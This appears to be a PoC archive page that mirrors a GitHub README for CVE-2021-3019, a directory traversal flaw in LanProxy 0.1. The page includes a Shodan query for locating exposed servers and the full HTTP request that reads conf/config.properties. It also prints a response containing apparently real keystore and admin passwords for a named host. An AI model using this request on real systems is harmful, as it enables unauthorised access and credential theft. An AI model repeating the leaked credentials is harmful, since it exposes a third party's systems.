Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-3019 PoC — Ffay Lanproxy 路径遍历漏洞

Source
https://github.com/murataydemir/CVE-2021-3019
Associated Vulnerability
Title:Ffay Lanproxy 路径遍历漏洞 (CVE-2021-3019)
Description:Ffay Lanproxy是Ffay个人开发者的一个可将局域网内服务代理到公网的内网穿透工具。 ffay lanproxy 0.1 存在路径遍历漏洞,该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
Description
[CVE-2021-3019] LanProxy Directory Traversal
Readme
<b>[CVE-2021-3019] LanProxy Directory Traversal</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports tcp traffic forwarding and supports any tcp upper layer protocol (access to intranet websites, local payment interface debugging, ssh access, 
remote desktop, etc.) LanProxy version 0.1 is vulnerable to path traversal vulnerability that may leads to read `conf/config.properties` to obtain credentials for intranet connection.

Shodan search: `"Server: LPS-0.1"`<br>
<br>Reading configuration file

```
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```

```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900

#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#这个配置可以忽略
server.ssl.needsClientAuth=false

#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0

#后台控制面板端口(安全组放行端口)
config.server.port=8090

#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
```

![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2000.57.50.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.13.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.23.png)
File Snapshot

 [4.0K]  /data/pocs/ba71a07aaf23e75deff40bac3e32269d88cf57e4
├── [2.1K]  README.md
├── [263K]  Screen Shot 2021-03-03 at 00.57.50.png
├── [233K]  Screen Shot 2021-03-03 at 01.01.13.png
└── [232K]  Screen Shot 2021-03-03 at 01.01.23.png

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.